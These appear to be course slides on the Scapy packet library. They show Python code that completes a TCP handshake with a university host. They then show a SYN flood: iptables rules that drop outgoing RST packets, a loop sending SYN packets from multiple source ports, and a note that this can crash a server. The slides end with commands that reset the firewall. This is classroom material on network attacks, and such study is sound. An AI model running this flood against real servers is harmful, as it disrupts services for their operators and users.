IT 4510

Scapy 2

Make sure to allow firewall access from 1.1.1.1 on GAIA


TCP

Recall a 3 way handshake is:


TCP

Example:


Example code

    #!/usr/bin/python

    from scapy.all import *

    conf.L3socket
    conf.L3socket=L3RawSocket

    i=IP()
    i.dst = "cit.dixie.edu"

    t = TCP()
    t.dport = 80
    r = sr1(i/t)
    t.flags = "A"
    t.seq = r.ack
    t.ack = r.seq + 1
    p = i/t
    reply = sr(p)

Syn Flood

We must start with this:

sudo iptables -A OUTPUT -p tcp -s 144.38.199.108 --tcp-flags RST RST -j DROP

A better way is this:

iptables -F; iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

Otherwise the kernel sends RST packets to target and Syn flood fails. (Because we are sending packets with scapy, and the OS doesn’t like this, so it tries to tell the target to ignore the connection)


Syn Flood

If you start too many syn requests to a server and never finish the handshake, you can crash the server.

Code to add:

    for p in range(20000, 20010):
        tcp.sport = p
        send(i/t)

SLowloris

Remove iptables junk from above:

    iptables -P INPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -t nat -F
    iptables -t mangle -F
    iptables -F
    iptables -X